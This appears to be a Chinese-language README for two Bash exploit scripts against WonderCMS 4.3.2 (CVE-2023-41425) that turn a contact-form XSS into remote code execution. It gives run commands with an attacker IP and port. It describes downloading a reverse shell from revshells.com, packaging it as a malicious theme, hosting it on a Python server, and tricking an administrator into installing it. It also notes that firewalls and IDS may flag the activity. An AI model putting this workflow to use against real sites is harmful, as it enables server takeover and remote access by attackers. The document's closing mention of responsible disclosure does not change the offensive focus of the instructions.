
WonderCMS 4.3.2 XSS 到 RCE 漏洞利用脚本
概述
这些脚本利用 WonderCMS 4.3.2 中的 XSS(跨站脚本)漏洞来实现 远程代码执行(RCE)。当管理员触发 XSS 载荷时,它会通过一个精心构造的恶意主题模块自动在目标服务器上安装反向 Shell。反向 Shell 从 revshells.com 获取并执行,从而使攻击者获得对服务器的远程访问权限。
目录
前提条件
要成功运行任一脚本,需满足以下工具和条件:
- Bash Shell:两个脚本均为使用 Bash Shell 的 Linux 环境编写。
- netcat (nc):用于监听反向 Shell 连接。
- Python3:使用简单的 Python HTTP 服务器来托管 XSS 载荷。
- WonderCMS 4.3.2:目标必须运行易受攻击的 WonderCMS 版本。
- 管理员交互:载荷需要管理员触发 XSS,从而导致反向 Shell 执行。
- revshells.com:反向 Shell 载荷动态从 revshells.com 下载。
脚本1:自动利用脚本
验证演示
Pasted image 20241010021603
功能特性
此版本的利用脚本会自动检查 nc 监听器是否激活,下载反向 Shell,启动 HTTP 服务器,发送载荷,并等待管理员触发反向 Shell。
- 自动反向 Shell 设置:从 revshells.com 下载预生成的反向 Shell。
- XSS 载荷注入:在目标的联系表单中注入 XSS 载荷。
- HTTP 服务器管理:自动启动 Python HTTP 服务器以托管反向 Shell 载荷。
- nc 监听器检查:确保监听器在运行后才继续执行。
- 自动发送载荷:无需用户交互即可自动发送载荷。
使用方法
- 确保
nc 监听器在指定端口上运行:
- 使用以下命令运行脚本:
./AUTO_CVE-2023-41425 <loginURL> <攻击者IP> <攻击者端口>
示例:
./AUTO_CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
工作流程
- 下载反向 Shell:脚本从
revshells.com 下载反向 Shell。
- 修改反向 Shell:使用攻击者的 IP 和端口更新反向 Shell 脚本。
- 创建 ZIP 载荷:创建一个包含反向 Shell 的 ZIP 文件。
- 构造 XSS 载荷:生成一个安装反向 Shell 的 XSS 载荷,并注入到易受攻击的联系表单中。
- 自动启动 HTTP 服务器:脚本启动一个 Python HTTP 服务器来提供恶意载荷。
- 自动发送载荷:XSS 载荷自动发送给管理员。
脚本2:手动利用脚本
验证演示
Pasted image 20241010013048
在网站字段中使用脚本提供的利用代码...
Pasted image 20241010013218
功能特性
此版本需要用户手动管理 nc 监听器和 XSS 载荷触发。更适合不希望自动处理的场景。
- 手动反向 Shell 设置:用户负责确保监听器正在运行。
- 手动 XSS 触发:脚本提供恶意链接供发送给管理员,但载荷必须由用户手动触发。
- HTTP 服务器管理:启动一个 Python HTTP 服务器来托管 XSS 载荷。
使用方法
- 确保
nc 监听器在指定端口上运行:
- 使用以下命令运行脚本:
./CVE-2023-41425 <loginURL> <攻击者IP> <攻击者端口>
示例:
./CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
工作流程
- 下载反向 Shell:从
revshells.com 下载反向 Shell。
- 修改反向 Shell:使用攻击者的 IP 和端口更新反向 Shell。
- 创建 ZIP 载荷:创建一个包含反向 Shell 的 ZIP 文件。
- 构造 XSS 载荷:生成一个安装反向 Shell 的 XSS 载荷。
- 显示恶意链接:显示需要发送给管理员以触发漏洞的链接。
- 启动 HTTP 服务器:启动一个 Python HTTP 服务器来托管载荷。
注意
- 管理员交互:两个利用脚本都依赖于 WonderCMS 管理员访问易受攻击的页面来触发 XSS 载荷。一旦触发,反向 Shell 将与攻击者的机器建立连接。
- 防火墙/IDS/IPS:在受防火墙或入侵检测系统保护的环境中运行这些利用脚本时需谨慎,这些系统可能会拦截或告警可疑活动。
- 负责任披露:如果您发现目标存在漏洞,请始终遵循道德准则,向相关方报告漏洞。